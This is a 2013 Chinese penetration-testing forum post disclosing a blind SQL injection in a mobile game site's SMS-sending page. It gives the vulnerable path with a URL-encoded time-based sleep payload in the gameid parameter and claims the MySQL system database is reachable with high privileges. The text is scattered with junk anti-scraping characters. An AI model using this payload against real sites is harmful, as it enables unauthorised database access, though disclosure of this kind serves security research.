中国网络渗透测试联盟

标题: 凤凰手机游戏网SQL盲注漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:34
标题: 凤凰手机游戏网SQL盲注漏洞
简要描述:- x2 ]! {6 d/ n- D5 N
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。+ X, ]3 g) o, g, d5 L
- h* X! p$ v3 D. W5 G/ o
详细说明:
% r5 ?: h3 |4 }存在SQL盲注url:4 L, n# h5 ]$ H0 |9 \! {
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
+ [# R/ l0 `( d$ F+ xhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png. C( }1 s) R) l: v- y
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png! w* X/ ]# \; C8 n  @% I4 C7 k& ~
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg# G" K+ f( _5 G
3 Q8 X) a7 a. E& P  `

能看到mysql系统数据库,看来user权限应该很高的。。





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2